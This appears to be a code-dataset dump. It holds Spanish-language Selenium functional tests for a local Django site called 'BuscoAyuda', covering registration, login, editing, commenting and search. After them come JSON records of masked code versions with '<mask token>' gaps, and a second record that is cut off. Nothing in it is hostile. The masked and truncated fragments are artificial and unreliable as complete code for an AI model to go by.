imagen = self.browser.find_element_by_id('id_imagen')
imagen.send_keys('C:\\chromedriver\\developer.jpg')
nombreUsuario = self.browser.find_element_by_id('id_username')
nombreUsuario.send_keys('re.medrano')
clave = self.browser.find_element_by_id('id_password')
clave.send_keys('prueba123')
botonGrabar = self.browser.find_element_by_id('id_grabar')
botonGrabar.click()
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="Rafael Medrano"]')
self.assertIn('Rafael Medrano', span.text)
def test_verDetalle(self):
self.browser.get('http://localhost:8000')
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
span.click()
self.browser.implicitly_wait(3)
h2 = self.browser.find_element(By.XPATH,
'//h2[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', h2.text)
def test_login(self):
self.browser.get('http://localhost:8000')
link = self.browser.find_element_by_id('id_login')
link.click()
nombreUsuario = self.browser.find_element_by_id('username')
nombreUsuario.send_keys('ba.montanez')
clave = self.browser.find_element_by_id('password')
clave.send_keys('prueba123')
botonIngresar = self.browser.find_element_by_id('id_ingresar')
botonIngresar.click()
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH, '//span[text()=" Logout"]')
self.assertIn('Logout', span.text)
def test_Editar(self):
self.browser.get('http://localhost:8000')
link = self.browser.find_element_by_id('id_login')
link.click()
nombreUsuario = self.browser.find_element_by_id('username')
nombreUsuario.send_keys('ba.montanez')
claveIngreso = self.browser.find_element_by_id('password')
claveIngreso.send_keys('prueba123')
botonIngresar = self.browser.find_element_by_id('id_ingresar')
botonIngresar.click()
self.browser.implicitly_wait(3)
linkEditar = self.browser.find_element_by_id('id_editar')
linkEditar.click()
nombre = self.browser.find_element_by_id('id_nombre')
nombre.clear()
nombre.send_keys('Betzy Editado')
apellidos = self.browser.find_element_by_id('id_apellidos')
apellidos.clear()
apellidos.send_keys('Montanez Editado')
experiencia = self.browser.find_element_by_id('id_aniosExperiencia')
experiencia.clear()
experiencia.send_keys('10')
self.browser.find_element_by_xpath(
"//select[@id='id_tiposDeServicio']/option[text()='Desarrollador Web']"
).click()
telefono = self.browser.find_element_by_id('id_telefono')
telefono.clear()
telefono.send_keys('313555666')
correo = self.browser.find_element_by_id('id_correo')
correo.clear()
correo.send_keys('ba.montanez01@uniandes.edu.co')
imagen = self.browser.find_element_by_id('id_imagen')
imagen.send_keys('C:\\chromedriver\\developer.jpg')
nombreUsuario = self.browser.find_element_by_id('id_username')
nombreUsuario.clear()
nombreUsuario.send_keys('ba.montanez2')
clave = self.browser.find_element_by_id('id_password')
clave.clear()
clave.send_keys('prueba1234')
botonGrabar = self.browser.find_element_by_id('id_editar')
botonGrabar.click()
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
def test_Comentar(self):
self.browser.get('http://localhost:8000')
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
span.click()
self.browser.implicitly_wait(3)
h2 = self.browser.find_element(By.XPATH,
'//h2[text()="Betzy Editado Montanez Editado"]')
correo = self.browser.find_element_by_id('correo')
correo.send_keys('prueba@prueba.com')
comentario = self.browser.find_element_by_id('comentario')
comentario.send_keys('Comentario Prueba')
botonAceptar = self.browser.find_element_by_id('id_comentar')
botonAceptar.click()
self.browser.implicitly_wait(6)
span = self.browser.find_element(By.XPATH,
'//p[text()="Comentario Prueba"]')
self.assertIn('Comentario Prueba', span.text)
def test_listado(self):
self.browser.get('http://localhost:8000')
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="pepito perez"]')
self.assertIn('pepito perez', span.text)
def test_buscar(self):
self.browser.get('http://localhost:8000')
correo = self.browser.find_element_by_id('buscar')
correo.send_keys('Betzy Editado Montanez Editado')
botonBuscar = self.browser.find_element_by_id('id_buscar')
botonBuscar.click()
self.browser.implicitly_wait(6)
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
<|reserved_special_token_1|>
__author__ = 'asistente'
#from __future__ import absolute_import
from unittest import TestCase
from selenium import webdriver
from selenium.webdriver.common.by import By
class FunctionalTest(TestCase):
def setUp(self):
self.browser = webdriver.Chrome("C:\\chromedriver\\chromedriver.exe")
self.browser.implicitly_wait(2)
def tearDown(self):
self.browser.quit()
def test_title(self):
self.browser.get('http://localhost:8000')
self.assertIn('BuscoAyuda', self.browser.title)
def test_registro(self):
self.browser.get('http://localhost:8000')
link = self.browser.find_element_by_id('id_register')
link.click()
nombre = self.browser.find_element_by_id('id_nombre')
nombre.send_keys('Rafael')
apellidos = self.browser.find_element_by_id('id_apellidos')
apellidos.send_keys('Medrano')
experiencia = self.browser.find_element_by_id('id_aniosExperiencia')
experiencia.send_keys('7')
self.browser.find_element_by_xpath(
"//select[@id='id_tiposDeServicio']/option[text()='Desarrollador Web']").click()
telefono = self.browser.find_element_by_id('id_telefono')
telefono.send_keys('3135555555')
correo = self.browser.find_element_by_id('id_correo')
correo.send_keys('re.medrano@uniandes.edu.co')
imagen = self.browser.find_element_by_id('id_imagen')
imagen.send_keys('C:\chromedriver\developer.jpg')
nombreUsuario = self.browser.find_element_by_id('id_username')
nombreUsuario.send_keys('re.medrano')
clave = self.browser.find_element_by_id('id_password')
clave.send_keys('prueba123')
botonGrabar = self.browser.find_element_by_id('id_grabar')
botonGrabar.click()
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH, '//span[text()="Rafael Medrano"]')
self.assertIn('Rafael Medrano', span.text)
def test_verDetalle(self):
self.browser.get('http://localhost:8000')
span = self.browser.find_element(By.XPATH, '//span[text()="Betzy Editado Montanez Editado"]')
span.click()
self.browser.implicitly_wait(3)
h2 = self.browser.find_element(By.XPATH, '//h2[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', h2.text)
def test_login(self):
self.browser.get('http://localhost:8000')
link = self.browser.find_element_by_id('id_login')
link.click()
nombreUsuario = self.browser.find_element_by_id('username')
nombreUsuario.send_keys('ba.montanez')
clave = self.browser.find_element_by_id('password')
clave.send_keys('prueba123')
botonIngresar = self.browser.find_element_by_id('id_ingresar')
botonIngresar.click()
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH, '//span[text()=" Logout"]')
self.assertIn('Logout', span.text)
def test_Editar(self):
self.browser.get('http://localhost:8000')
link = self.browser.find_element_by_id('id_login')
link.click()
nombreUsuario = self.browser.find_element_by_id('username')
nombreUsuario.send_keys('ba.montanez')
claveIngreso = self.browser.find_element_by_id('password')
claveIngreso.send_keys('prueba123')
botonIngresar = self.browser.find_element_by_id('id_ingresar')
botonIngresar.click()
self.browser.implicitly_wait(3)
linkEditar = self.browser.find_element_by_id('id_editar')
linkEditar.click()
nombre = self.browser.find_element_by_id('id_nombre')
nombre.clear()
nombre.send_keys('Betzy Editado')
apellidos = self.browser.find_element_by_id('id_apellidos')
apellidos.clear()
apellidos.send_keys('Montanez Editado')
experiencia = self.browser.find_element_by_id('id_aniosExperiencia')
experiencia.clear()
experiencia.send_keys('10')
self.browser.find_element_by_xpath(
"//select[@id='id_tiposDeServicio']/option[text()='Desarrollador Web']").click()
telefono = self.browser.find_element_by_id('id_telefono')
telefono.clear()
telefono.send_keys('313555666')
correo = self.browser.find_element_by_id('id_correo')
correo.clear()
correo.send_keys('ba.montanez01@uniandes.edu.co')
imagen = self.browser.find_element_by_id('id_imagen')
imagen.send_keys('C:\chromedriver\developer.jpg')
nombreUsuario = self.browser.find_element_by_id('id_username')
nombreUsuario.clear()
nombreUsuario.send_keys('ba.montanez2')
clave = self.browser.find_element_by_id('id_password')
clave.clear()
clave.send_keys('prueba1234')
botonGrabar = self.browser.find_element_by_id('id_editar')
botonGrabar.click()
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH, '//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
def test_Comentar(self):
self.browser.get('http://localhost:8000')
span = self.browser.find_element(By.XPATH, '//span[text()="Betzy Editado Montanez Editado"]')
span.click()
self.browser.implicitly_wait(3)
h2 = self.browser.find_element(By.XPATH, '//h2[text()="Betzy Editado Montanez Editado"]')
correo = self.browser.find_element_by_id('correo')
correo.send_keys('prueba@prueba.com')
comentario = self.browser.find_element_by_id('comentario')
comentario.send_keys('Comentario Prueba')
botonAceptar = self.browser.find_element_by_id('id_comentar')
botonAceptar.click()
self.browser.implicitly_wait(6)
span = self.browser.find_element(By.XPATH, '//p[text()="Comentario Prueba"]')
self.assertIn('Comentario Prueba', span.text)
def test_listado(self):
self.browser.get('http://localhost:8000')
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH, '//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH, '//span[text()="pepito perez"]')
self.assertIn('pepito perez', span.text)
def test_buscar(self):
self.browser.get('http://localhost:8000')
correo = self.browser.find_element_by_id('buscar')
correo.send_keys('Betzy Editado Montanez Editado')
botonBuscar = self.browser.find_element_by_id('id_buscar')
botonBuscar.click()
self.browser.implicitly_wait(6)
span = self.browser.find_element(By.XPATH, '//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
|
flexible
|
{
"blob_id": "fc4cf800c663abf20bfba7fcc1032e09a992641b",
"index": 5334,
"step-1": "<mask token>\n\n\nclass FunctionalTest(TestCase):\n\n def setUp(self):\n self.browser = webdriver.Chrome('C:\\\\chromedriver\\\\chromedriver.exe')\n self.browser.implicitly_wait(2)\n\n def tearDown(self):\n self.browser.quit()\n <mask token>\n <mask token>\n\n def test_verDetalle(self):\n self.browser.get('http://localhost:8000')\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n span.click()\n self.browser.implicitly_wait(3)\n h2 = self.browser.find_element(By.XPATH,\n '//h2[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', h2.text)\n <mask token>\n <mask token>\n <mask token>\n\n def test_listado(self):\n self.browser.get('http://localhost:8000')\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"pepito perez\"]')\n self.assertIn('pepito perez', span.text)\n\n def test_buscar(self):\n self.browser.get('http://localhost:8000')\n correo = self.browser.find_element_by_id('buscar')\n correo.send_keys('Betzy Editado Montanez Editado')\n botonBuscar = self.browser.find_element_by_id('id_buscar')\n botonBuscar.click()\n self.browser.implicitly_wait(6)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n",
"step-2": "<mask token>\n\n\nclass FunctionalTest(TestCase):\n\n def setUp(self):\n self.browser = webdriver.Chrome('C:\\\\chromedriver\\\\chromedriver.exe')\n self.browser.implicitly_wait(2)\n\n def tearDown(self):\n self.browser.quit()\n <mask token>\n <mask token>\n\n def test_verDetalle(self):\n self.browser.get('http://localhost:8000')\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n span.click()\n self.browser.implicitly_wait(3)\n h2 = self.browser.find_element(By.XPATH,\n '//h2[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', h2.text)\n <mask token>\n <mask token>\n\n def test_Comentar(self):\n self.browser.get('http://localhost:8000')\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n span.click()\n self.browser.implicitly_wait(3)\n h2 = self.browser.find_element(By.XPATH,\n '//h2[text()=\"Betzy Editado Montanez Editado\"]')\n correo = self.browser.find_element_by_id('correo')\n correo.send_keys('prueba@prueba.com')\n comentario = self.browser.find_element_by_id('comentario')\n comentario.send_keys('Comentario Prueba')\n botonAceptar = self.browser.find_element_by_id('id_comentar')\n botonAceptar.click()\n self.browser.implicitly_wait(6)\n span = self.browser.find_element(By.XPATH,\n '//p[text()=\"Comentario Prueba\"]')\n self.assertIn('Comentario Prueba', span.text)\n\n def test_listado(self):\n self.browser.get('http://localhost:8000')\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"pepito perez\"]')\n self.assertIn('pepito perez', span.text)\n\n def test_buscar(self):\n self.browser.get('http://localhost:8000')\n correo = self.browser.find_element_by_id('buscar')\n correo.send_keys('Betzy Editado Montanez Editado')\n botonBuscar = self.browser.find_element_by_id('id_buscar')\n botonBuscar.click()\n self.browser.implicitly_wait(6)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n",
"step-3": "<mask token>\n\n\nclass FunctionalTest(TestCase):\n\n def setUp(self):\n self.browser = webdriver.Chrome('C:\\\\chromedriver\\\\chromedriver.exe')\n self.browser.implicitly_wait(2)\n\n def tearDown(self):\n self.browser.quit()\n\n def test_title(self):\n self.browser.get('http://localhost:8000')\n self.assertIn('BuscoAyuda', self.browser.title)\n <mask token>\n\n def test_verDetalle(self):\n self.browser.get('http://localhost:8000')\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n span.click()\n self.browser.implicitly_wait(3)\n h2 = self.browser.find_element(By.XPATH,\n '//h2[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', h2.text)\n <mask token>\n\n def test_Editar(self):\n self.browser.get('http://localhost:8000')\n link = self.browser.find_element_by_id('id_login')\n link.click()\n nombreUsuario = self.browser.find_element_by_id('username')\n nombreUsuario.send_keys('ba.montanez')\n claveIngreso = self.browser.find_element_by_id('password')\n claveIngreso.send_keys('prueba123')\n botonIngresar = self.browser.find_element_by_id('id_ingresar')\n botonIngresar.click()\n self.browser.implicitly_wait(3)\n linkEditar = self.browser.find_element_by_id('id_editar')\n linkEditar.click()\n nombre = self.browser.find_element_by_id('id_nombre')\n nombre.clear()\n nombre.send_keys('Betzy Editado')\n apellidos = self.browser.find_element_by_id('id_apellidos')\n apellidos.clear()\n apellidos.send_keys('Montanez Editado')\n experiencia = self.browser.find_element_by_id('id_aniosExperiencia')\n experiencia.clear()\n experiencia.send_keys('10')\n self.browser.find_element_by_xpath(\n \"//select[@id='id_tiposDeServicio']/option[text()='Desarrollador Web']\"\n ).click()\n telefono = self.browser.find_element_by_id('id_telefono')\n telefono.clear()\n telefono.send_keys('313555666')\n correo = self.browser.find_element_by_id('id_correo')\n correo.clear()\n correo.send_keys('ba.montanez01@uniandes.edu.co')\n imagen = self.browser.find_element_by_id('id_imagen')\n imagen.send_keys('C:\\\\chromedriver\\\\developer.jpg')\n nombreUsuario = self.browser.find_element_by_id('id_username')\n nombreUsuario.clear()\n nombreUsuario.send_keys('ba.montanez2')\n clave = self.browser.find_element_by_id('id_password')\n clave.clear()\n clave.send_keys('prueba1234')\n botonGrabar = self.browser.find_element_by_id('id_editar')\n botonGrabar.click()\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n\n def test_Comentar(self):\n self.browser.get('http://localhost:8000')\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n span.click()\n self.browser.implicitly_wait(3)\n h2 = self.browser.find_element(By.XPATH,\n '//h2[text()=\"Betzy Editado Montanez Editado\"]')\n correo = self.browser.find_element_by_id('correo')\n correo.send_keys('prueba@prueba.com')\n comentario = self.browser.find_element_by_id('comentario')\n comentario.send_keys('Comentario Prueba')\n botonAceptar = self.browser.find_element_by_id('id_comentar')\n botonAceptar.click()\n self.browser.implicitly_wait(6)\n span = self.browser.find_element(By.XPATH,\n '//p[text()=\"Comentario Prueba\"]')\n self.assertIn('Comentario Prueba', span.text)\n\n def test_listado(self):\n self.browser.get('http://localhost:8000')\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"pepito perez\"]')\n self.assertIn('pepito perez', span.text)\n\n def test_buscar(self):\n self.browser.get('http://localhost:8000')\n correo = self.browser.find_element_by_id('buscar')\n correo.send_keys('Betzy Editado Montanez Editado')\n botonBuscar = self.browser.find_element_by_id('id_buscar')\n botonBuscar.click()\n self.browser.implicitly_wait(6)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n",
"step-4": "__author__ = 'asistente'\nfrom unittest import TestCase\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\n\nclass FunctionalTest(TestCase):\n\n def setUp(self):\n self.browser = webdriver.Chrome('C:\\\\chromedriver\\\\chromedriver.exe')\n self.browser.implicitly_wait(2)\n\n def tearDown(self):\n self.browser.quit()\n\n def test_title(self):\n self.browser.get('http://localhost:8000')\n self.assertIn('BuscoAyuda', self.browser.title)\n\n def test_registro(self):\n self.browser.get('http://localhost:8000')\n link = self.browser.find_element_by_id('id_register')\n link.click()\n nombre = self.browser.find_element_by_id('id_nombre')\n nombre.send_keys('Rafael')\n apellidos = self.browser.find_element_by_id('id_apellidos')\n apellidos.send_keys('Medrano')\n experiencia = self.browser.find_element_by_id('id_aniosExperiencia')\n experiencia.send_keys('7')\n self.browser.find_element_by_xpath(\n \"//select[@id='id_tiposDeServicio']/option[text()='Desarrollador Web']\"\n ).click()\n telefono = self.browser.find_element_by_id('id_telefono')\n telefono.send_keys('3135555555')\n correo = self.browser.find_element_by_id('id_correo')\n correo.send_keys('re.medrano@uniandes.edu.co')\n imagen = self.browser.find_element_by_id('id_imagen')\n imagen.send_keys('C:\\\\chromedriver\\\\developer.jpg')\n nombreUsuario = self.browser.find_element_by_id('id_username')\n nombreUsuario.send_keys('re.medrano')\n clave = self.browser.find_element_by_id('id_password')\n clave.send_keys('prueba123')\n botonGrabar = self.browser.find_element_by_id('id_grabar')\n botonGrabar.click()\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Rafael Medrano\"]')\n self.assertIn('Rafael Medrano', span.text)\n\n def test_verDetalle(self):\n self.browser.get('http://localhost:8000')\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n span.click()\n self.browser.implicitly_wait(3)\n h2 = self.browser.find_element(By.XPATH,\n '//h2[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', h2.text)\n\n def test_login(self):\n self.browser.get('http://localhost:8000')\n link = self.browser.find_element_by_id('id_login')\n link.click()\n nombreUsuario = self.browser.find_element_by_id('username')\n nombreUsuario.send_keys('ba.montanez')\n clave = self.browser.find_element_by_id('password')\n clave.send_keys('prueba123')\n botonIngresar = self.browser.find_element_by_id('id_ingresar')\n botonIngresar.click()\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH, '//span[text()=\" Logout\"]')\n self.assertIn('Logout', span.text)\n\n def test_Editar(self):\n self.browser.get('http://localhost:8000')\n link = self.browser.find_element_by_id('id_login')\n link.click()\n nombreUsuario = self.browser.find_element_by_id('username')\n nombreUsuario.send_keys('ba.montanez')\n claveIngreso = self.browser.find_element_by_id('password')\n claveIngreso.send_keys('prueba123')\n botonIngresar = self.browser.find_element_by_id('id_ingresar')\n botonIngresar.click()\n self.browser.implicitly_wait(3)\n linkEditar = self.browser.find_element_by_id('id_editar')\n linkEditar.click()\n nombre = self.browser.find_element_by_id('id_nombre')\n nombre.clear()\n nombre.send_keys('Betzy Editado')\n apellidos = self.browser.find_element_by_id('id_apellidos')\n apellidos.clear()\n apellidos.send_keys('Montanez Editado')\n experiencia = self.browser.find_element_by_id('id_aniosExperiencia')\n experiencia.clear()\n experiencia.send_keys('10')\n self.browser.find_element_by_xpath(\n \"//select[@id='id_tiposDeServicio']/option[text()='Desarrollador Web']\"\n ).click()\n telefono = self.browser.find_element_by_id('id_telefono')\n telefono.clear()\n telefono.send_keys('313555666')\n correo = self.browser.find_element_by_id('id_correo')\n correo.clear()\n correo.send_keys('ba.montanez01@uniandes.edu.co')\n imagen = self.browser.find_element_by_id('id_imagen')\n imagen.send_keys('C:\\\\chromedriver\\\\developer.jpg')\n nombreUsuario = self.browser.find_element_by_id('id_username')\n nombreUsuario.clear()\n nombreUsuario.send_keys('ba.montanez2')\n clave = self.browser.find_element_by_id('id_password')\n clave.clear()\n clave.send_keys('prueba1234')\n botonGrabar = self.browser.find_element_by_id('id_editar')\n botonGrabar.click()\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n\n def test_Comentar(self):\n self.browser.get('http://localhost:8000')\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n span.click()\n self.browser.implicitly_wait(3)\n h2 = self.browser.find_element(By.XPATH,\n '//h2[text()=\"Betzy Editado Montanez Editado\"]')\n correo = self.browser.find_element_by_id('correo')\n correo.send_keys('prueba@prueba.com')\n comentario = self.browser.find_element_by_id('comentario')\n comentario.send_keys('Comentario Prueba')\n botonAceptar = self.browser.find_element_by_id('id_comentar')\n botonAceptar.click()\n self.browser.implicitly_wait(6)\n span = self.browser.find_element(By.XPATH,\n '//p[text()=\"Comentario Prueba\"]')\n self.assertIn('Comentario Prueba', span.text)\n\n def test_listado(self):\n self.browser.get('http://localhost:8000')\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"pepito perez\"]')\n self.assertIn('pepito perez', span.text)\n\n def test_buscar(self):\n self.browser.get('http://localhost:8000')\n correo = self.browser.find_element_by_id('buscar')\n correo.send_keys('Betzy Editado Montanez Editado')\n botonBuscar = self.browser.find_element_by_id('id_buscar')\n botonBuscar.click()\n self.browser.implicitly_wait(6)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n",
"step-5": "__author__ = 'asistente'\n\n#from __future__ import absolute_import\n\nfrom unittest import TestCase\nfrom selenium import webdriver\n\nfrom selenium.webdriver.common.by import By\n\nclass FunctionalTest(TestCase):\n\n def setUp(self):\n self.browser = webdriver.Chrome(\"C:\\\\chromedriver\\\\chromedriver.exe\")\n self.browser.implicitly_wait(2)\n\n def tearDown(self):\n self.browser.quit()\n\n def test_title(self):\n self.browser.get('http://localhost:8000')\n self.assertIn('BuscoAyuda', self.browser.title)\n\n def test_registro(self):\n self.browser.get('http://localhost:8000')\n link = self.browser.find_element_by_id('id_register')\n link.click()\n\n nombre = self.browser.find_element_by_id('id_nombre')\n nombre.send_keys('Rafael')\n\n apellidos = self.browser.find_element_by_id('id_apellidos')\n apellidos.send_keys('Medrano')\n\n experiencia = self.browser.find_element_by_id('id_aniosExperiencia')\n experiencia.send_keys('7')\n\n self.browser.find_element_by_xpath(\n \"//select[@id='id_tiposDeServicio']/option[text()='Desarrollador Web']\").click()\n telefono = self.browser.find_element_by_id('id_telefono')\n telefono.send_keys('3135555555')\n\n correo = self.browser.find_element_by_id('id_correo')\n correo.send_keys('re.medrano@uniandes.edu.co')\n\n imagen = self.browser.find_element_by_id('id_imagen')\n imagen.send_keys('C:\\chromedriver\\developer.jpg')\n\n nombreUsuario = self.browser.find_element_by_id('id_username')\n nombreUsuario.send_keys('re.medrano')\n\n clave = self.browser.find_element_by_id('id_password')\n clave.send_keys('prueba123')\n\n botonGrabar = self.browser.find_element_by_id('id_grabar')\n botonGrabar.click()\n self.browser.implicitly_wait(3)\n\n span = self.browser.find_element(By.XPATH, '//span[text()=\"Rafael Medrano\"]')\n self.assertIn('Rafael Medrano', span.text)\n\n def test_verDetalle(self):\n self.browser.get('http://localhost:8000')\n span = self.browser.find_element(By.XPATH, '//span[text()=\"Betzy Editado Montanez Editado\"]')\n span.click()\n self.browser.implicitly_wait(3)\n h2 = self.browser.find_element(By.XPATH, '//h2[text()=\"Betzy Editado Montanez Editado\"]')\n\n self.assertIn('Betzy Editado Montanez Editado', h2.text)\n\n def test_login(self):\n self.browser.get('http://localhost:8000')\n link = self.browser.find_element_by_id('id_login')\n link.click()\n\n nombreUsuario = self.browser.find_element_by_id('username')\n nombreUsuario.send_keys('ba.montanez')\n\n clave = self.browser.find_element_by_id('password')\n clave.send_keys('prueba123')\n\n botonIngresar = self.browser.find_element_by_id('id_ingresar')\n botonIngresar.click()\n\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH, '//span[text()=\" Logout\"]')\n\n self.assertIn('Logout', span.text)\n\n\n def test_Editar(self):\n self.browser.get('http://localhost:8000')\n link = self.browser.find_element_by_id('id_login')\n link.click()\n\n nombreUsuario = self.browser.find_element_by_id('username')\n nombreUsuario.send_keys('ba.montanez')\n\n claveIngreso = self.browser.find_element_by_id('password')\n claveIngreso.send_keys('prueba123')\n\n botonIngresar = self.browser.find_element_by_id('id_ingresar')\n botonIngresar.click()\n\n self.browser.implicitly_wait(3)\n\n linkEditar = self.browser.find_element_by_id('id_editar')\n linkEditar.click()\n\n nombre = self.browser.find_element_by_id('id_nombre')\n nombre.clear()\n nombre.send_keys('Betzy Editado')\n\n apellidos = self.browser.find_element_by_id('id_apellidos')\n apellidos.clear()\n apellidos.send_keys('Montanez Editado')\n\n experiencia = self.browser.find_element_by_id('id_aniosExperiencia')\n experiencia.clear()\n experiencia.send_keys('10')\n\n self.browser.find_element_by_xpath(\n \"//select[@id='id_tiposDeServicio']/option[text()='Desarrollador Web']\").click()\n telefono = self.browser.find_element_by_id('id_telefono')\n telefono.clear()\n telefono.send_keys('313555666')\n\n correo = self.browser.find_element_by_id('id_correo')\n correo.clear()\n correo.send_keys('ba.montanez01@uniandes.edu.co')\n\n imagen = self.browser.find_element_by_id('id_imagen')\n imagen.send_keys('C:\\chromedriver\\developer.jpg')\n\n nombreUsuario = self.browser.find_element_by_id('id_username')\n nombreUsuario.clear()\n nombreUsuario.send_keys('ba.montanez2')\n\n clave = self.browser.find_element_by_id('id_password')\n clave.clear()\n clave.send_keys('prueba1234')\n\n botonGrabar = self.browser.find_element_by_id('id_editar')\n botonGrabar.click()\n\n self.browser.implicitly_wait(3)\n\n span = self.browser.find_element(By.XPATH, '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n\n def test_Comentar(self):\n self.browser.get('http://localhost:8000')\n span = self.browser.find_element(By.XPATH, '//span[text()=\"Betzy Editado Montanez Editado\"]')\n span.click()\n self.browser.implicitly_wait(3)\n h2 = self.browser.find_element(By.XPATH, '//h2[text()=\"Betzy Editado Montanez Editado\"]')\n\n correo = self.browser.find_element_by_id('correo')\n correo.send_keys('prueba@prueba.com')\n\n comentario = self.browser.find_element_by_id('comentario')\n comentario.send_keys('Comentario Prueba')\n\n botonAceptar = self.browser.find_element_by_id('id_comentar')\n botonAceptar.click()\n self.browser.implicitly_wait(6)\n\n span = self.browser.find_element(By.XPATH, '//p[text()=\"Comentario Prueba\"]')\n self.assertIn('Comentario Prueba', span.text)\n\n def test_listado(self):\n self.browser.get('http://localhost:8000')\n\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH, '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH, '//span[text()=\"pepito perez\"]')\n self.assertIn('pepito perez', span.text)\n\n def test_buscar(self):\n self.browser.get('http://localhost:8000')\n\n correo = self.browser.find_element_by_id('buscar')\n correo.send_keys('Betzy Editado Montanez Editado')\n\n botonBuscar = self.browser.find_element_by_id('id_buscar')\n botonBuscar.click()\n self.browser.implicitly_wait(6)\n\n span = self.browser.find_element(By.XPATH, '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)",
"step-ids": [
6,
7,
9,
13,
14
]
}
|
[
6,
7,
9,
13,
14
] |
from django.urls import path
from .views import FirstModelView
urlpatterns = [path('firstModel', FirstModelView.as_view())]
|
normal
|
{
"blob_id": "4efd22d132accd0f5945a0c911b73b67654b92e4",
"index": 9358,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('firstModel', FirstModelView.as_view())]\n",
"step-3": "from django.urls import path\nfrom .views import FirstModelView\nurlpatterns = [path('firstModel', FirstModelView.as_view())]\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
